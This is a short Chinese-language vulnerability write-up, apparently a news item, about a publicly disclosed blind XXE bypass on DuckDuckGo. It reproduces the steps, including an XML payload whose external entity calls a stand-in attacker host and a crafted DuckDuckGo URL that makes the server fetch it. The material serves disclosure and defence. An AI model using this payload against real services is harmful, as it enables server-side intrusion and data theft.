DuckDuckGo上Blind XXE漏洞防护绕过
近期,白帽汇安全研究院发现HackerOne网站公开了一个DuckDuckGo网站的XXE漏洞。该漏洞是以前一个DuckDuckGo网站XXE漏洞的新绕过方法,两个漏洞的发现者为同一个人。(上个XXE漏洞说明:https://nosec.org/home/detail/2219.html)
DuckDuckGo强调在传统搜寻引擎的基础上引入各大Web 2.0站点的内容。其办站哲学主张维护使用者的隐私权,并承诺不监控、不记录使用者的搜寻内容。
——来自百度百科
以下为漏洞具体说明:
复现步骤
- 首先攻击者在自己的外网伺服器上搭建web服务,并且放上一个文件内容如下的XXE攻击文件(xml文件):
<?xm l version="1.0" ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM "http://attacker_host/Blind_xxe"> %ext;
]>
<r></r>
- 攻击者在浏览器上访问
https://duckduckgo.com/x.js?u=http://attacker_host/xxe.xml
,其中http://attacker_host/xxe.xml
代表上一步的XXE攻击文件: - 最后,攻击者可在自己的伺服器上检测到
http://attacker_host/Blind_xxe
被访问,这说明攻击者的xm l文件成功被DuckDuckGo解析。